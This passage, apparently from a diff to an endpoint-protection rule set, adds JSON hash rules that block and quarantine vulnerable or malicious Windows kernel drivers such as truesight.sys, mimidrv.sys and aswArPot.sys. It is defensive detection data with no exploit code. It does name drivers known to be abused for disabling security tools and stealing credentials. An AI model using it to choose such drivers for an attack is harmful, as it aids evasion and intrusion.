"c2898d715a1806b6cb574bff1dcd4bb2fd026ac624a2fbe71b7f17a64d0a9451", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "529e41e1-a567-5074-ba3a-e1832b7f427f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477387Z", + "creation_date": "2026-03-23T11:45:31.477392Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477402Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44846eb04ec95ad86927cfc02e9c9a6d844aad4d1ec35f78af96ce947a34abcb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52aac6e5-5194-5326-87ea-5f7d0d06bebe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469204Z", + "creation_date": "2026-03-23T11:45:30.469207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469216Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6745f1ac0dc8014e359672c7d5d1c01588ab4a68ea96eea2dea811dcdcf5131", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52ad1c48-ef9c-5e31-b35b-8fab3426ba4b", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835236Z", + "creation_date": "2026-03-23T11:45:30.835239Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835249Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "904bf42fb075bcf938002fb94cc789996f0382457c28b3840aac9c4f51d49c27", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52b1f8d2-3e16-57ef-b881-1714ef44d937", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143633Z", + "creation_date": "2026-03-23T11:45:31.143635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143640Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "befe8b4c4c12f393e783fdccd07f6172ef58f80034999243b5bee5067daa75df", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52b6c001-178b-53c7-b472-61e1c6d3f279", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475218Z", + "creation_date": "2026-03-23T11:45:31.475222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a09c5f5139ce37bf2341f475372528b0d904435e5c8bf00c9bb96a6bdc4c431c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52bc6453-8972-5988-9327-a678846161dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487737Z", + "creation_date": "2026-03-23T11:45:31.487739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ef0ef0e4a25261c5f26f42c079357746baf4bc4fe23844f2c2a0b3ca0a4ed61", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52bd9ef3-dabf-5d05-ad32-a8849dfea35b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142790Z", + "creation_date": "2026-03-23T11:45:31.142792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"18e45ac31f7750ad3bab2dfc6776648f1ecb8c95bdbe2c59fa3b2438d3879e43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52ce985a-38f6-581a-b388-8ef6f2f61541", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811062Z", + "creation_date": "2026-03-23T11:45:31.811064Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811069Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc7f129e228fcb6f6b88fd3f7125bf406d8e243273d451861507a553b1cef028", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52cec98f-d8b9-56db-aea6-d17f48db3f4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828636Z", + "creation_date": "2026-03-23T11:45:31.828639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828644Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7842397055abfd4e47b669d3c0aa004fbb8c4e8b9ed6c30c9a8cae2bb24c7a1e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "52d55f1d-ed66-5d5b-b749-bb726322610a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465084Z", + "creation_date": "2026-03-23T11:45:30.465088Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "673bbc7fa4154f7d99af333014e888599c27ead02710f7bc7199184b30b38653", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5304a61d-3ad5-5742-8ba6-7c908ba54b05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159633Z", + "creation_date": "2026-03-23T11:45:31.159635Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159641Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f91b41629b47e7b5e9102ae70712c7fa9b903399e2de4b50ba86bcbf8e32f5b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5306fcf3-00cf-5003-8bf3-028c2401d1ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143315Z", + "creation_date": 
"2026-03-23T11:45:32.143317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143324Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b261d4065c03dcc732a951a9451b3a9f6054899eb3b8a4062dfed1c0ca3f3755", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5315e712-040e-529f-9e26-248e49dd8384", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975639Z", + "creation_date": "2026-03-23T11:45:29.975641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975646Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a65d14fd3b1b5981084cdbd293dc6f4558911ea18dd80177d1e5b54d85bcaa0", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"53290af5-8482-59f6-a560-0ec05a691241", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621581Z", + "creation_date": "2026-03-23T11:45:29.621583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621589Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "841335eeb6af68dce5b8b24151776281a751b95056a894991b23afae80e9f33b", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "533e53b0-6165-56a3-bcf3-a1688a95c014", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159674Z", + "creation_date": "2026-03-23T11:45:31.159676Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159681Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c3720a4d0f874f5e33a916d51c9816bf97b0747d3fabee202b6dd65850da2fc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "533f4a17-e0ca-53d7-bb1b-8ab99f92e8bb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822282Z", + "creation_date": "2026-03-23T11:45:30.822284Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a787df19468ba5fce5de825983251507867c6d3ff72d93e19466f2201013bab9", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53407e2b-cef6-5c3e-98ff-322c638c16f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462285Z", + "creation_date": "2026-03-23T11:45:30.462288Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462297Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "caa87fc917ab2ccf9bf2ad715173d74e031626c6bd3c80dca01f27933fec7242", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "534f24ba-8291-52a8-9818-ebcdf85e6f0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816918Z", + "creation_date": "2026-03-23T11:45:30.816920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816926Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b177164100a31fd01e7f0a24cb0a32015736d3c7c65744c21914a2d4459ef83d", + "comment": "Vulnerable Kernel Driver 
(aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53523b27-2616-5189-9754-e344bc35fbc4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.603813Z", + "creation_date": "2026-03-23T11:45:29.603830Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.603843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9ed73af3aef69dc1fb91731d6d0a649e93f83d0f07ddb9729d71c2d00ed0801", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53576683-d7cc-560a-914d-19d46271986b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969326Z", + "creation_date": "2026-03-23T11:45:29.969328Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969335Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcb815eb8e9016608d0d917101b6af8c84b96fb709dc0344bceed02cbc4ed258", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "535b3f6b-a52f-5870-b2b6-cea9a1acc571", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620531Z", + "creation_date": "2026-03-23T11:45:29.620532Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620538Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "536a5f69-5ed6-5702-9448-65b3ce0cee3d", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150053Z", + "creation_date": "2026-03-23T11:45:31.150055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dfde0032a696096b94df74e932b6f013cd93f34ec0d41caf30d1b06193b907c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "53717789-cd42-53fc-bcd2-47a213d5084f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147806Z", + "creation_date": "2026-03-23T11:45:31.147808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147813Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b147582875918a84fbf5e07343a6b06bd533d79924c159549d07b63a8b0b8ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "537b981d-754d-5cbc-b4f5-45c203388138", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819731Z", + "creation_date": "2026-03-23T11:45:31.819734Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d56a9c9ce41cc5233163b3d82c646eef8eb726c441a3c0c5a46d6f5ca6c35dcf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "537be632-afd9-5b5b-b3ed-c4a6ebb8b6d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
